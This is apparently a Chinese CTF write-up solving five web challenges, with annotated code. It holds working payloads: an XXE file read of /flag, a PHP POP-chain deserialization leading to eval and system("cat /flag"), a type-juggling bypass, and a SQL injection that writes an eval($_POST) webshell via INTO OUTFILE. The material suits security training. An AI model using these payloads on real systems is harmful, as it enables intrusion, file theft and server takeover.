Web

HNGK-xxx

xxe

描述:

xxx

image-20221029202221957

点击登录按钮没有反应,查看页面源码发现登录是通过 ajax 提交的

<script type='text/javascript'>
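function doLogin() {
    // Reads the two form fields and POSTs them to doLogin.php as an XML document.
    var username = $("#username").val();
    var password = $("#password").val();
    if (username == "" || password == "") {
        alert("Please enter the username and password!");
        return;
    }

    // Escape the XML metacharacters so a field value cannot break out of its
    // element (the original concatenated the raw strings into the document).
    // This only protects the document the *browser* builds; a client can send
    // any body it likes, so the server-side XML parser must still refuse to
    // resolve DTD/external entities for request bodies.
    function xmlEscape(s) {
        return String(s)
            .replace(/&/g, "&amp;")
            .replace(/</g, "&lt;")
            .replace(/>/g, "&gt;")
            .replace(/"/g, "&quot;")
            .replace(/'/g, "&apos;");
    }

    var data = "<user><username>" + xmlEscape(username) + "</username>" +
               "<password>" + xmlEscape(password) + "</password></user>";
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        // The original had a misspelled option "anysc: false"; jQuery ignores
        // unknown keys, so the request was already asynchronous and the key is
        // simply dropped here.
        success: function (result) {
            // Tolerate a response that lacks <code>/<msg> (or has an empty
            // element) instead of throwing inside the callback.
            var codeNode = result.getElementsByTagName("code")[0];
            var msgNode = result.getElementsByTagName("msg")[0];
            var code = codeNode && codeNode.childNodes[0] ? codeNode.childNodes[0].nodeValue : "";
            var msg = msgNode && msgNode.childNodes[0] ? msgNode.childNodes[0].nodeValue : "";
            if (code == "0") {
                $(".msg").text(msg + " login fail!");
            } else if (code == "1") {
                $(".msg").text(msg + " login success!");
            } else {
                $(".msg").text("error:" + msg);
            }
        },
        error: function (XMLHttpRequest, textStatus, errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}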
</script>

构造请求包发现admin(即登录名)存在回显

payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >]>
<user>
<username>&admin;</username>
<password>xxe;</password>
</user>

image-20221029202019270

HNGK-DS_Store

pop链

描述:

首先你得明白,DS_store是个什么

存在DS_Store泄露

bXlwb3AucGhw

mypop.php

 <?php
// Prints this file's own source into the response (this is what the writeup reads).
highlight_file(__FILE__);


// Gadget: reading any undefined property on a Fish falls through to __get(),
// which calls whatever $this->food holds as a callable. If food is an object
// that defines __invoke(), that method runs.
class Fish{
public $food;
public function __construct(){
// Only relevant when constructed normally: an empty array is not callable.
// unserialize() does not call __construct(), so food is whatever the input says.
$this->food = array();
}
public function __get($value){
$function = $this->food;
return $function();
}
}


// Sink of the chain: __invoke() hands the protected $hack string to run(),
// which eval()s it. The leading @ only silences warnings raised by the
// evaluated code; it does not prevent execution. __toString() merely returns
// $bubble and plays no part in the chain.
class Bubble{
public $bubble;
protected $hack;
public function __toString(){
return $this->bubble;
}
public function run($value){
@eval($value);
}
public function __invoke(){
$this->run($this->hack);
}
}

// Link in the chain: stringifying a Turtle reads $this->tail->head. When $tail
// is an object that has no "head" property, that read triggers the object's
// __get() (see Fish).
class Turtle{
public $head;
public $tail;
// Not invoked by unserialize(); only matters when the class is constructed directly.
public function __construct($tail="tail"){
$this->tail = $tail;
echo $tail;
}
public function __toString(){
return $this->tail->head;
}
}

// Entry point of the chain: __wakeup() runs right after unserialize() and uses a
// loose comparison ($this->rock != 'ash'). When $rock is an object, PHP
// converts it to a string for the comparison, which calls its __toString()
// (see Turtle). __destruct() also stringifies $rock for preg_match(), but the
// keyword check only echoes a message and stops nothing.
class Stone{
public $rock;
public $ash;
public function __construct($nice="wow"){
$this->rock = $nice;
echo "My rock --- ".$this->rock."<br>";
}
public function __destruct(){
if(preg_match("/fish|bubble|gopher|http|file|ftp|https|dict|\.\./i", $this->rock)) {
echo "no~no~no~";
}
}
// No visibility keyword: defaults to public.
function __wakeup(){
if ($this->rock != 'ash') {
$this->rock = 'ash';
}
}
}


// Deserializes attacker-controlled input. The only guard is a regex over the
// query-string values that rejects anything beginning with "O" (a serialized
// object starts with "O:"). The values are obtained by re-parsing REQUEST_URI
// with parse_url(); the writeup bypasses this with a "///" prefix on the path,
// presumably because parse_url() fails on it, leaving $url['query'] unset,
// $q empty and the loop never executed. A stricter regex is not the fix:
// untrusted data should never reach unserialize() — use json_decode(), or at
// minimum unserialize($data, ['allowed_classes' => false]).
$data = @$_GET['data'];
if(isset($data)){
$url = parse_url($_SERVER['REQUEST_URI']);
parse_str($url['query'],$q);
foreach($q as $v)
{
if(preg_match("/^O/i",$v))
{
die('***k hacker!!!');
// Unreachable: die() above already terminated the script.
exit();
}
}
unserialize($data);
}

?>

链子:

Stone::__wakeup() -> Turtle::__toString() -> Fish::__get() -> Bubble::__invoke() -> Bubble::run()

parse_url 的检查用 `///` 前缀绕过(见下方 payload)

poc

<?php
// Local stub of the challenge class: only the property matters for serialize();
// the methods are kept commented out so nothing runs while generating the string.
class Fish{
public $food;
// public function __construct(){
// $this->food = array();
// }
// public function __get($value){
// $function = $this->food;
// return $function();
// }
}


// Local stub of the challenge class. $hack is protected here as in the original,
// so its serialized name carries the "\0*\0" prefix (the %00%2A%00 in the payload).
class Bubble{
public $bubble;
protected $hack='system("cat /flag");';
// public function __toString(){
// return $this->bubble;
// }
// public function run($value){
// @eval($value);
// }
// public function __invoke(){
// $this->run($this->hack);
// }
}

// Local stub of the challenge class; property order (head, tail) matches the
// original so the serialized output has the same layout.
class Turtle{
public $head;
public $tail;
// public function __construct($tail="tail"){
// $this->tail = $tail;
// echo $tail;
// }
// public function __toString(){
// return $this->tail->head;
// }
}

// Local stub of the challenge class; __wakeup() and __destruct() are left
// commented out so the local script only serializes and never triggers them.
class Stone{
public $rock;
public $ash;
// public function __construct($nice="wow"){
// $this->rock = $nice;
// echo "My rock --- ".$this->rock."<br>";
// }
// public function __destruct(){
// if(preg_match("/fish|bubble|gopher|http|file|ftp|https|dict|\.\./i", $this->rock)) {
// echo "no~no~no~";
// }
// }
// function __wakeup(){
// if ($this->rock != 'ash') {
// $this->rock = 'ash';
// }
// }
}
// Wire the objects in the order the chain analysis above lists them:
// Stone.rock -> Turtle, Turtle.tail -> Fish, Fish.food -> Bubble.
$x=new Turtle();
$xx=new Fish();
$xxx=new Bubble();
$xxxx=new Stone();

$xx->food=$xxx;

$x->tail=$xx;

$xxxx->rock=$x;
echo serialize($xxxx);
echo "\n";
// The URL-encoded form is needed because the protected-property name contains NUL bytes.
echo urlencode(serialize($xxxx));

payload:

///mypop.php?data=O%3A5%3A%22Stone%22%3A2%3A%7Bs%3A4%3A%22rock%22%3BO%3A6%3A%22Turtle%22%3A2%3A%7Bs%3A4%3A%22head%22%3BN%3Bs%3A4%3A%22tail%22%3BO%3A4%3A%22Fish%22%3A1%3A%7Bs%3A4%3A%22food%22%3BO%3A6%3A%22Bubble%22%3A2%3A%7Bs%3A6%3A%22bubble%22%3BN%3Bs%3A7%3A%22%00%2A%00hack%22%3Bs%3A20%3A%22system%28%22cat+%2Fflag%22%29%3B%22%3B%7D%7D%7Ds%3A3%3A%22ash%22%3BN%3B%7D

image-20221029201542413

HNGK-兰亭集序

任意读取

描述:

兰亭集序

开局先看URL

index.php?file=http://47.92.27.98:28046/poem.php

源码有个提示

<!-- 偷偷告诉你,flag在fflagggg.php中 -->

image-20221029202911704

直接读

index.php?file=fflagggg.php

image-20221029203007970

HNGK-phpgame

弱类型

描述:

有时候,乱码其实并不乱

浏览器修复一下文字编码即可看到明文

有时候,这种乱码其实并不乱,入口在这里: ΡΗΡ⒍⒍.ΡΗΡ 

入口为php66.php

源码:

<?php
// Prints this file's own source, which is how the checks below were read.
show_source(__FILE__);

$Step1=False;
$Step2=False;
// json_decode() returns an object for a JSON object; the (array) cast turns its
// top-level keys into array keys. Nested JSON arrays arrive as PHP arrays.
$info=(array)json_decode(@$_GET['get']);
if(is_array($info)){
// Rejects numeric "year" values; any non-numeric, truthy value passes.
is_numeric(@$info["year"])?die("Sorry~"):NULL;
if(@$info["year"]){
// Single "=" is an assignment, not a comparison: it stores 2022 (truthy), so
// $Step1 is always set once this branch is entered. A check would be "===".
($info["year"]=2022)?$Step1=True:NULL;
}
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
// array_search() without strict: true compares with ==, so an element that is
// only loosely equal to "game" (the payload uses true) is found here ...
$status = array_search("game", $info["items"]);
$status===false?die("Sorry~"):NULL;
// ... while this loop compares with === and rejects only the literal string.
// The two checks only agree if array_search() is also given strict: true.
foreach($info["items"] as $key=>$val){
$val==="game"?die("Sorry~"):NULL;
}
$Step2=True;
}
}
if($Step1 && $Step2){
echo getenv("FLAG");
}
?>

payload:

?get={"year":"x","items":[true,[1,2],"skiing2"]}

image-20221029204002629

HNGK-out

sql注入(联合查询)

描述:

一个简单的sql注入

image-20221029204232797

发现过滤了

select or 空格

payload示例:

?id=0'union/**/selselectect/**/1,2,group_concat(passwoorrd)/**/from/**/users ;%00

image-20221029204317989

双写绕过关键字,空格也可以双写绕过。

搜寻了一番,发现数据库没有flag,上马

0'union/**/selselectect/**/1,2,0x3c3f3d6576616c28245f504f53545b315d293b3f3e/**/into/**/outfile/**/'/var/www/html/1.php';%00

image-20221029204452558

虽然报错,但是小马已经写入了。

image-20221029204537963

image-20221029204600709